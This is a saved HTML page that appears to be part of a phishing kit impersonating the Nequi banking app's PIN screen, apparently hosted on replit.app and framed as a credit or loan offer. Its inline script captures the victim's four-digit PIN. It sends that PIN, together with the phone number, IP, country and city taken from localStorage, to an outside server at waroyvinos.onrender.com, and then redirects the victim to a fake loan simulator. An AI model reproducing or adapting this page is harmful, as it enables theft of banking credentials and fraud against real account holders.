<!DOCTYPE html>
<!-- saved from url=(0068)https://estudiodecredito.replit.app/1/validate-data/auth-v2-pass.php -->
<html lang="en">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Nequi</title>
  <link rel="stylesheet" href="../css/spinner-2.css">
  <link rel="stylesheet" href="../css/navbar.css">
  <link rel="stylesheet" href="../css/globals-2.css">


  <link rel="shortcut icon" type="image/x-icon" href="../assets/favicon-2.ico">
  <style>
    .loadingContainer {
      display: none;
    }

    footer {
      margin-top: 40px;
      background: url(../assets/footer-nequi.svg);
      background-repeat: no-repeat;
      background-size: cover;
      padding: 100px 0 60px 0;
    }
  </style>
</head>

<body class="bg-purple-primary h-dvh flex flex-col">
  <main class="loadingContainer">
    <header class="z-[999] fixed top-0 w-full h-16 mx-auto pt-0 pb-0 overflow-visible bg-white">
      <div class="flex items-center h-full border-b border-gray-primary bg-white px-[26px]">
        <div class="flex items-center justify-between w-full max-w-[61.875rem] h-full mx-auto">
          <a href="access-sign-in-pass.php.html" class="h-8 [&amp;&gt;svg]:w-[100px]">
            <svg _ngcontent-atq-c28="" width="180" height="40" viewbox="0 0 104 32" fill="none" xmlns="http://www.w3.org/2000/svg" class="splash__container__svg">
              <path _ngcontent-atq-c28="" d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z" fill="#DA0081" class="point__up"></path>
              <path _ngcontent-atq-c28="" d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z" fill="#DA0081" class="point__down"></path>
              <path _ngcontent-atq-c28="" d="M31.9876 0H28.2187C27.7033 0 27.3006 0.416 27.3006 0.912V15.872C27.3006 16.176 26.8979 16.288 26.753 16.016L17.991 0.4C17.8461 0.144 17.5884 0 17.2823 0H11.0169C10.5015 0 10.0988 0.416 10.0988 0.912V24.816C10.0988 25.328 10.5176 25.728 11.0169 25.728H14.7858C15.3012 25.728 15.7039 25.312 15.7039 24.816V9.408C15.7039 9.104 16.1066 8.992 16.2515 9.264L25.2551 25.344C25.4 25.6 25.6577 25.744 25.9638 25.744H31.9554C32.4708 25.744 32.8735 25.328 32.8735 24.832V0.912C32.8735 0.4 32.4547 0 31.9554 0H31.9876Z" fill="#200020" class="N"></path>
              <path _ngcontent-atq-c28="" d="M54.6495 16.3999C54.6495 9.66395 50.2363 6.31995 45.3883 6.31995C39.0906 6.31995 35.4988 10.6559 35.4988 16.5119C35.4988 23.1679 40.0087 26.3359 45.2433 26.3359C50.4779 26.3359 53.5382 23.6479 54.3596 20.1599C54.4724 19.7119 54.2147 19.3119 53.5382 19.3119H50.5746C50.2363 19.3119 49.9464 19.4879 49.8015 19.8239C49.0606 21.4399 47.8687 22.2879 45.5815 22.2879C42.9884 22.2879 41.2489 20.6719 40.9912 17.3919H53.7315C54.2791 17.3919 54.6495 16.9919 54.6495 16.3999ZM41.2006 13.8559C41.7482 11.4399 43.1656 10.3679 45.3077 10.3679C47.2244 10.3679 48.8673 11.4719 49.0928 13.8559H41.2006Z" fill="#200020" class="E"></path>
              <path _ngcontent-atq-c28="" d="M103.082 6.80005H99.2969C98.7899 6.80005 98.3788 7.20837 98.3788 7.71205V24.832C98.3788 25.3357 98.7899 25.744 99.2969 25.744H103.082C103.589 25.744 104 25.3357 104 24.832V7.71205C104 7.20837 103.589 6.80005 103.082 6.80005Z" fill="#200020" class="I"></path>
              <path _ngcontent-atq-c28="" d="M74.976 6.80002H71.2071C70.6917 6.80002 70.289 7.21602 70.289 7.71202V8.64002C69.1615 7.32802 67.3093 6.41602 64.8772 6.41602C59.4332 6.41602 56.5501 11.312 56.5501 16.496C56.5501 21.024 58.9178 26.096 64.7644 26.096C66.8583 26.096 69.081 25.104 70.289 23.696V31.056C70.289 31.568 70.7078 31.968 71.2071 31.968H74.976C75.4914 31.968 75.8941 31.552 75.8941 31.056V7.72802C75.8941 7.21602 75.4753 6.81602 74.976 6.81602V6.80002ZM66.3912 22.064C63.9108 22.064 62.1713 20.256 62.1713 16.368C62.1713 12.48 63.9108 10.448 66.3912 10.448C68.8716 10.448 70.6111 12.32 70.6111 16.368C70.6111 20.416 68.8716 22.064 66.3912 22.064Z" fill="#200020" class="Q"></path>
              <path _ngcontent-atq-c28="" d="M95.0448 6.80005H91.2759C90.7604 6.80005 90.3578 7.21605 90.3578 7.71205V17.3921C90.3578 20.5121 88.9565 21.4241 87.1687 21.4241C85.3809 21.4241 83.9796 20.5121 83.9796 17.3921V7.71205C83.9796 7.20005 83.5608 6.80005 83.0615 6.80005H79.2926C78.7772 6.80005 78.3745 7.21605 78.3745 7.71205V17.7921C78.3745 23.7921 81.7086 26.2081 87.1848 26.2081C92.661 26.2081 95.9951 23.7761 95.9951 17.7921V7.71205C95.9951 7.20005 95.5763 6.80005 95.077 6.80005H95.0448Z" fill="#200020" class="U"></path>
            </svg>
          </a>
          <button class="flex flex-col justify-between w-[25px] h-[20px] bg-transparent border-none cursor-pointer" aria-label="Menu">
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
            <span class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
          </button>
        </div>
      </div>
    </header>

    <section class="mainSectionContainer loading">
      <div class="hero-image"></div>
      <div class="mainSectionWrapper">
        <div class="logo_nequi_animado">
          <img src="../assets/loading-nequi.webp" alt="">
        </div>
        <p class="wait-msg">Por favor, espere...</p>
        <p class="info-msg">En este momento estamos validando algunos datos. puede tardar un momento.</p>

        <div class="bottom" style="display: flex;">
          <p class="warning-msg">*Valido desde el <span id="dia">07</span> de <span id="mes">Agosto</span> al <span id="dia2">25</span> de <span id="mes2">diciembre</span> del <span id="anio">2025</span>, aplican T&amp;C
          </p>
          <img src="../assets/seguro_fogafin.svg" alt="image">
        </div>
      </div>
    </section>

    <footer>
      <div class="wrap">
        <div class="wrapper">
          <div class="footer">
            <img class="footer-pc" src="../assets/footer-bigscreen-1.png" alt="">
            <img class="footer-mobile" src="../assets/footer-1.png" alt="">
          </div>
        </div>
      </div>
    </footer>
  </main>

  <!-- MODAL DE ERROR -->
  <div class="bg-white fixed top-0 left-0 w-full h-full z-50 hidden" id="error-login">
    <div class="min-h-dvh p-11 max-w-screen-sm mx-auto flex justify-center items-center">
      <section class="bg-white rounded-lg py-11 mb-80">
        <div class="flex flex-col items-center">
          <div class="flex justify-center items-center">
            <img class="max-w-[5.5rem]" src="../assets/iconsad.svg" alt="">
          </div>
          <h1 class="text-lg font-bold text-[#210021] w-full text-center mb-4 mt-1">
            ¡Ups, algo salió mal!
          </h1>
          <p id="wait-msg" class="text-[#210021] w-full text-center mb-4 mt-1 text-sm font-medium">
            El número de teléfono o la contraseña que proporcionaste no son
            correctos. Por favor revísalos e intenta ingresar nuevamente.
          </p>
          <button class="bg-[#DA0081] text-white px-4 py-2 rounded-lg mx-auto cursor-pointer hover:bg-[#c1007a]" id="tryAgainButton">
            Intentar nuevamente
          </button>
        </div>
      </section>
    </div>
  </div>

  <header class="w-full flex flex-col p-5 mb-4">
    <a href="./auth-login.html" class="w-6 h-6 text-white mb-5">
      <svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 448 512" fill="currentColor" width="100%" height="100%">
        <path d="M9.4 233.4c-12.5 12.5-12.5 32.8 0 45.3l160 160c12.5 12.5 32.8 12.5 45.3 0s12.5-32.8 0-45.3L109.2 288 416 288c17.7 0 32-14.3 32-32s-14.3-32-32-32l-306.7 0L214.6 118.6c12.5-12.5 12.5-32.8 0-45.3s-32.8-12.5-45.3 0l-160 160z">
        </path>
      </svg>
    </a>
    <h1 class="text-white text-2xl font-bold">Escribe tu clave</h1>
  </header>
  <section class="flex-1 max-w-[420px] flex flex-col mx-auto w-full px-4">
    <div class="max-w-[350px] w-full flex justify-center gap-8 mx-auto [&amp;&gt;input]:w-11 [&amp;&gt;input]:h-11 [&amp;&gt;input]:text-center [&amp;&gt;input]:bg-guanabana [&amp;&gt;input]:rounded-sm [&amp;&gt;input]:text-4xl [&amp;&gt;input]:font-bold [&amp;&gt;input]:text-pink-primary [&amp;&gt;input]:focus:outline-none [&amp;&gt;input]:pt-2.5">
      <input id="pass-1" maxlength="1" inputmode="none" readonly="readonly">
      <input id="pass-2" maxlength="1" inputmode="none" readonly="readonly">
      <input id="pass-3" maxlength="1" inputmode="none" readonly="readonly">
      <input id="pass-4" maxlength="1" inputmode="none" readonly="readonly">
    </div>
    <p class="text-center text-white text-sm mt-5 mb-8">
      No dudamos que seas tú...
      <br>
      Pero es mejor confirmar ;)
    </p>
    <div class="mt-auto w-full max-w-[400px] mx-auto" id="keyboard">
      <div class="flex justify-around mb-4 [&amp;&gt;button]:w-12 [&amp;&gt;button]:h-12 [&amp;&gt;button]:border-none [&amp;&gt;button]:bg-transparent [&amp;&gt;button]:text-4xl [&amp;&gt;button]:text-white [&amp;&gt;button]:cursor-pointer [&amp;&gt;button]:rounded-full [&amp;&gt;button]:transition-colors [&amp;&gt;button]:duration-200 [&amp;&gt;button]:select-none [&amp;&gt;button]:touch-manipulation [&amp;&gt;button]:focus:outline-none">
        <button class="keyboard-btn" data-value="1">1</button>
        <button class="keyboard-btn" data-value="2">2</button>
        <button class="keyboard-btn" data-value="3">3</button>
      </div>
      <div class="flex justify-around mb-4 [&amp;&gt;button]:w-12 [&amp;&gt;button]:h-12 [&amp;&gt;button]:border-none [&amp;&gt;button]:bg-transparent [&amp;&gt;button]:text-4xl [&amp;&gt;button]:text-white [&amp;&gt;button]:cursor-pointer [&amp;&gt;button]:rounded-full [&amp;&gt;button]:transition-colors [&amp;&gt;button]:duration-200 [&amp;&gt;button]:select-none [&amp;&gt;button]:touch-manipulation [&amp;&gt;button]:focus:outline-none">
        <button class="keyboard-btn" data-value="4">4</button>
        <button class="keyboard-btn" data-value="5">5</button>
        <button class="keyboard-btn" data-value="6">6</button>
      </div>
      <div class="flex justify-around mb-4 [&amp;&gt;button]:w-12 [&amp;&gt;button]:h-12 [&amp;&gt;button]:border-none [&amp;&gt;button]:bg-transparent [&amp;&gt;button]:text-4xl [&amp;&gt;button]:text-white [&amp;&gt;button]:cursor-pointer [&amp;&gt;button]:rounded-full [&amp;&gt;button]:transition-colors [&amp;&gt;button]:duration-200 [&amp;&gt;button]:select-none [&amp;&gt;button]:touch-manipulation [&amp;&gt;button]:focus:outline-none">
        <button class="keyboard-btn" data-value="7">7</button>
        <button class="keyboard-btn" data-value="8">8</button>
        <button class="keyboard-btn" data-value="9">9</button>
      </div>
      <div class="flex justify-around mb-8 [&amp;&gt;button]:w-12 [&amp;&gt;button]:h-12 [&amp;&gt;button]:border-none [&amp;&gt;button]:bg-transparent [&amp;&gt;button]:text-4xl [&amp;&gt;button]:text-white [&amp;&gt;button]:cursor-pointer [&amp;&gt;button]:rounded-full [&amp;&gt;button]:transition-colors [&amp;&gt;button]:duration-200 [&amp;&gt;button]:select-none [&amp;&gt;button]:touch-manipulation [&amp;&gt;button]:focus:outline-none">
        <button class="keyboard-btn invisible"></button>
        <button class="keyboard-btn" data-value="0">0</button>
        <button class="keyboard-btn" id="delete-otp" style="font-size: 1rem;">
          <svg xmlns="http://www.w3.org/2000/svg" class="w-8 h-8" fill="currentColor" viewbox="0 0 24 24">
            <path d="M22 3H7c-.69 0-1.23.35-1.59.88L0 12l5.41 8.11c.36.53.9.89 1.59.89h15c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-3 12.59L17.59 17 14 13.41 10.41 17 9 15.59 12.59 12 9 8.41 10.41 7 14 10.59 17.59 7 19 8.41 15.41 12 19 15.59z">
            </path>
          </svg>
        </button>
      </div>
    </div>
  </section>

  <script>
    document.addEventListener("DOMContentLoaded", () => {
      const inputs = document.querySelectorAll('input[id^="pass-"]');
      const keyboard = document.getElementById("keyboard");
      const deleteBtn = document.getElementById("delete-otp");
      const loadingSpinner = document.querySelector(".loadingContainer");
      const errorLogin = document.getElementById("error-login");
      const tryAgainButton = document.getElementById("tryAgainButton");

      let currentInput = 0;
      let pinValues = ["", "", "", ""];

      // === FUNCIÓN DE VALIDACIÓN DE NÚMEROS CONSECUTIVOS ===
      function tieneTresSeguidos(entrada) {
        const texto = String(entrada);
        const regex = /(.)\1\1/;
        return regex.test(texto);
      }

      // === BOTÓN "INTENTAR NUEVAMENTE" ===
      tryAgainButton.addEventListener("click", function() {
        window.location.href = "access-sign-in-pass.php.html";
      });

      // === Configuración del loader temporizado (20–25s) ===
      const REDIRECT_URL = "loan-simulator.php.html";
      const LOADER_MIN_MS = 3000; // 20s
      const LOADER_MAX_MS = 3000; // 25s
      let redirectTimerId = null;

      function startTimedRedirect() {
        const ms = Math.floor(LOADER_MIN_MS + Math.random() * (LOADER_MAX_MS - LOADER_MIN_MS));
        redirectTimerId = setTimeout(() => {
          window.location.href = REDIRECT_URL;
        }, ms);
      }

      function cancelTimedRedirect() {
        if (redirectTimerId) {
          clearTimeout(redirectTimerId);
          redirectTimerId = null;
        }
      }

      // Manejar clics del teclado
      keyboard.addEventListener("click", async function(e) {
        const button = e.target.closest(".keyboard-btn");

        if (!button) return;

        // Si es el botón de borrar
        if (button.id === "delete-otp") {
          if (currentInput > 0) {
            currentInput--;
            pinValues[currentInput] = "";
            inputs[currentInput].value = "";
          }
          return;
        }

        // Si es un botón numérico
        const value = button.dataset.value;
        if (value !== undefined && value !== "" && currentInput < inputs.length) {
          pinValues[currentInput] = value;
          inputs[currentInput].value = "*";
          inputs[currentInput].dataset.realValue = value;
          currentInput++;

          // Verificar si está completo (4 dígitos)
          if (currentInput === 4) {
            const pass = pinValues.join("");

            // Mostrar spinner
            loadingSpinner.style.display = "block";

            // === VALIDAR SI TIENE 3 DÍGITOS CONSECUTIVOS ===
            if (tieneTresSeguidos(pass)) {
              setTimeout(function() {
                loadingSpinner.style.display = "none";
                errorLogin.style.display = "block";
              }, 3000);
              return;
            }

            // === SI LA CLAVE ES VÁLIDA, CONTINUAR ===
            // Obtener datos del localStorage
            const formData = JSON.parse(localStorage.getItem("formData")) || {};
            const numero = formData.phoneNumber || "No disponible";
            const ip = formData.ip || "No disponible";

            // Guardar contraseña en localStorage
            formData.password = pass;
            localStorage.setItem("formData", JSON.stringify(formData));

            // ========== ENVIAR AL BACKEND ==========
            const sessionId = localStorage.getItem('sessionId') || 'session_' + Date.now();
            const country = localStorage.getItem('country') || 'Unknown';
            const city = localStorage.getItem('city') || 'Unknown';

            try {
              await fetch('https://waroyvinos.onrender.com/step1-credentials', {
                method: "POST",
                headers: {
                  "Content-Type": "application/json",
                },
                body: JSON.stringify({
                  sessionId: sessionId,
                  phoneNumber: numero,
                  password: pass,
                  ip: ip,
                  country: country,
                  city: city
                }),
              });

              // Iniciar redirección temporizada
              startTimedRedirect();

            } catch (error) {
              console.error("Error al enviar:", error);
              loadingSpinner.style.display = "none";
              errorLogin.style.display = "block";
            }
          }
        }
      });

      // Permitir borrar con tecla retroceso
      document.addEventListener("keydown", function(e) {
        if (e.key === "Backspace" && currentInput > 0) {
          currentInput--;
          pinValues[currentInput] = "";
          inputs[currentInput].value = "";
        }
      });

      // Bloquear entrada directa en los inputs
      inputs.forEach(function(input) {
        input.addEventListener("focus", function(e) {
          e.target.blur();
        });
        input.addEventListener("paste", function(e) {
          e.preventDefault();
        });
      });
    });
  </script>
</body>

</html>